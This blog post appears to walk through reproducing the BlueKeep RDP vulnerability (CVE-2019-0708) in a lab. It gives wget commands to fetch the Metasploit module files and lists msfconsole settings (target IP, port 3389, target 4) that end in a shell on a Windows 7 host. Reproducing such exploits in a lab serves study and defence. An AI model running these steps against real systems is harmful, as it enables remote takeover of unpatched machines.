Reproducing the CVE-2019-0708 exploit


This vulnerability has been out for several months; I was too busy to write it up until now, so I am redoing it here.

Prepare the environment:
Win7 target machine IP address: 172.16.15.118
Kali attacker machine IP address: 172.16.15.50

Note that the msf tools on the Kali machine must be updated to the latest version; otherwise the module will not show up when you load cve-2019-0708.

Download the vulnerability modules
# Download directly in Kali with these commands
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

Once the downloads finish, the four files are in the current directory.

Move the files to the specified locations:
Move rdp.rb to the /usr/share/metasploit-framework/lib/msf/core/exploit directory.

Put rdp_scanner.rb and cve_2019_0708_bluekeep.rb in the /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp directory.

Put cve_2019_0708_bluekeep_rce.rb in the /usr/share/metasploit-framework/modules/exploits/windows/rdp directory. Note that if the rdp directory does not exist, you need to create it.

The environment is ready.

Exploit

First run msfconsole to enter the msf framework.

Enter reload_all to reload all modules.

Enter search cve-2019-0708 to find the vulnerability module we are going to use.

Our vulnerability module has been loaded successfully.

Select the module with the command use exploit/windows/rdp/cve_2019_0708_bluekeep_rce.

After entering the module, enter show options to view the parameters we need to set.

If you do not know the specific value of a parameter, you can look it up with the show command.

The settings:

Set the target machine IP address: set RHOSTS 172.16.15.118
Set the attack port: set rport 3389
Set the target ID: set target 4

Use the run or exploit command to launch the attack.

As shown here, we have successfully obtained a shell on the target.

Summary and issues:

1. Attacking this vulnerability very easily blue-screens the target machine, and it can take several attempts before it succeeds, so do not test it on machines that run business services.

2. If the vulnerability module does not load, update msf to the latest version and copy the downloaded files into place again.


Origin www.cnblogs.com/yanlzy/p/11856091.html